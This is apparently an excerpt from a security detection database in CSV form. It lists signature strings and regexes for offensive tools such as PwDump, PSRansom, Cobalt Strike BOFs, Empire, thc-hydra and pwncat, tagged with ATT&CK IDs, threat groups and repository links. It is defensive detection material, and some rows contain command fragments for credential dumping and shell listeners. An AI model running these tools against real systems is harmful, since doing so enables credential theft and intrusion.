"*purplepanda_config.py*",".{0,1000}purplepanda_config\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55836"
"*purplepanda_github.py*",".{0,1000}purplepanda_github\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55837"
"*PURPLEPANDA_NEO4J_URL=*",".{0,1000}PURPLEPANDA_NEO4J_URL\=.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55838"
"*purplepanda_prints.py*",".{0,1000}purplepanda_prints\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55839"
"*PURPLEPANDA_PWD=*",".{0,1000}PURPLEPANDA_PWD\=.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55840"
"*PurpleSharp.exe*",".{0,1000}PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","55841"
"*PurpleSharp.Lib.IPAddressRange*",".{0,1000}PurpleSharp\.Lib\.IPAddressRange.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","55842"
"*PUSH_CONNECTION_OUTSIDESPECULA*",".{0,1000}PUSH_CONNECTION_OUTSIDESPECULA.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","55843"
"*putterpanda_whoami*",".{0,1000}putterpanda_whoami.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","55844"
"*puttygen.exe FUZZ*",".{0,1000}puttygen\.exe\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","55845"
"*putty-infected.exe*",".{0,1000}putty\-infected\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","55846"
"*puzzlepeaches/NTLMRecon*",".{0,1000}puzzlepeaches\/NTLMRecon.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","55847"
"*pwcrack initdb*",".{0,1000}pwcrack\sinitdb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","55848"
"*pwcrack updatedb*",".{0,1000}pwcrack\supdatedb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","55849"
"*PWCrack*",".{0,1000}PWCrack.{0,1000}","offensive_tool_keyword","PWCrack","cracking tool for multiple hash type","T1110 - T1111 - T1210 - T1558.002 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","N/A","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","55850"
"*pwd*/*/rules/best64.rule*",".{0,1000}pwd.{0,1000}\/.{0,1000}\/rules\/best64\.rule.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55853"
"*pwd/C2Files/*",".{0,1000}pwd\/C2Files\/.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","55854"
"*pwd\C2Files\*",".{0,1000}pwd\\C2Files\\.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","55855"
"*pwd_dump *",".{0,1000}pwd_dump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","55856"
"*pwd|creds|cred|secret|userpw*",".{0,1000}pwd\|creds\|cred\|secret\|userpw.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","55857"
"*pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass|pass*",".{0,1000}pwd\|passwd\|password\|PASSWD\|PASSWORD\|dbuser\|dbpass\|pass.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","55858"
"*pwd+c5eeCXJF7Mxr3qeKtaTa2727SSpvYnGD2ptzGMnNO0iye*",".{0,1000}pwd\+c5eeCXJF7Mxr3qeKtaTa2727SSpvYnGD2ptzGMnNO0iye.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","55859"
"*PwDLwAGAAkELwAGAK8ALwAOAE8FPgUGAG8FeQMGAK0ChwUOAC0FSAQOAMsASAQGABAFeQMAAAAAHAAAAAAAAQABAAAAEABxAxIDQQABAAEAUCAAAAAAkQA5ALQAAQDsIAAAAACRAOQD*",".{0,1000}PwDLwAGAAkELwAGAK8ALwAOAE8FPgUGAG8FeQMGAK0ChwUOAC0FSAQOAMsASAQGABAFeQMAAAAAHAAAAAAAAQABAAAAEABxAxIDQQABAAEAUCAAAAAAkQA5ALQAAQDsIAAAAACRAOQD.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","55863"
"*pwdump -f *",".{0,1000}pwdump\s\-f\s.{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55865"
"*Pwdump v7.1 - raw password extractor*",".{0,1000}Pwdump\sv7\.1\s\-\sraw\spassword\sextractor.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55866"
"*PwDump v8.2 - dumps windows password hashes*",".{0,1000}PwDump\sv8\.2\s\-\sdumps\swindows\spassword\shashes.{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55867"
"*PWDump*",".{0,1000}PWDump\..{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003 - T1003.002","TA0006","N/A","menuPass - APT41 - Threat Group-3390 - APT1 - Turla - APT39 - FIN5","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55868"
"*PWDump.*",".{0,1000}PWDump\..{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003 - T1003.002","TA0006","N/A","menuPass - APT41 - Threat Group-3390 - APT1 - Turla - APT39 - FIN5","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55869"
"*pwdump.exe*",".{0,1000}pwdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55870"
"*pwdump.py SYSTEM SAM*",".{0,1000}pwdump\.py\sSYSTEM\sSAM.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","55871"
"*pwdump/cachedump*",".{0,1000}pwdump\/cachedump.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","55872"
"*PwDump7.exe*",".{0,1000}PwDump7\.exe.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55874"
"*PWDumpDLLPath*",".{0,1000}PWDumpDLLPath.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55875"
"*PWDumpEXEPath*",".{0,1000}PWDumpEXEPath.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55876"
"*-PWDumpFormat*",".{0,1000}\-PWDumpFormat.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55877"
"*PWDumpX *",".{0,1000}PWDumpX\s.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55879"
"*PWDumpX v1.0*",".{0,1000}PWDumpX\sv1\.0.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55880"
"*PWDumpX.zip*",".{0,1000}PWDumpX\.zip.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55881"
"*PwDxOWaXzpP3j/eP8RpnnSf89H/76NEv+uk/3j/OmYrqMLj/ADpf*",".{0,1000}PwDxOWaXzpP3j\/eP8RpnnSf89H\/76NEv\+uk\/3j\/OmYrqMLj\/ADpf.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","55882"
"*-PWHashes.txt*",".{0,1000}\-PWHashes\.txt.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55883"
"*pw-inspector -*",".{0,1000}pw\-inspector\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","55884"
"*pw-inspector.*",".{0,1000}pw\-inspector\..{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","55885"
"*pwn_jenkins*",".{0,1000}pwn_jenkins.{0,1000}","offensive_tool_keyword","pwn_jenkins","Remote Code Execution for jenkins","T1216 - T1210 - T1573","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gquere/pwn_jenkins","1","0","N/A","N/A","N/A","10","2049","336","2024-07-10T11:18:30Z","2018-07-18T14:24:27Z","55886"
"*pwn1sher/CS-BOFs*",".{0,1000}pwn1sher\/CS\-BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","55887"
"*pwn1sher/WMEye*",".{0,1000}pwn1sher\/WMEye.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","55888"
"*pwn3d_label = Pwn3d!*",".{0,1000}pwn3d_label\s\=\sPwn3d!.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","55889"
"*pwnagotchi*",".{0,1000}pwnagotchi.{0,1000}","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/evilsocket/pwnagotchi","1","0","N/A","network exploitation tool","N/A","10","8267","1185","2025-03-31T09:38:00Z","2019-09-19T13:07:15Z","55890"
"*pwnat.exe*",".{0,1000}pwnat\.exe.{0,1000}","offensive_tool_keyword","pwnat","pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. even when the client is also behind a NAT","T1584 - T1571 - T1210.001","TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/samyk/pwnat","1","0","N/A","N/A","N/A","10","3546","493","2025-04-21T06:25:14Z","2012-08-10T05:55:11Z","55891"
"*pwncat-cs *:*",".{0,1000}pwncat\-cs\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55892"
"*pwncat-cs -lp *",".{0,1000}pwncat\-cs\s\-lp\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55893"
"*pwncat-cs ssh://*",".{0,1000}pwncat\-cs\sssh\:\/\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55894"
"*pwndb --target @* --output *",".{0,1000}pwndb\s\-\-target\s\@.{0,1000}\s\-\-output\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55895"
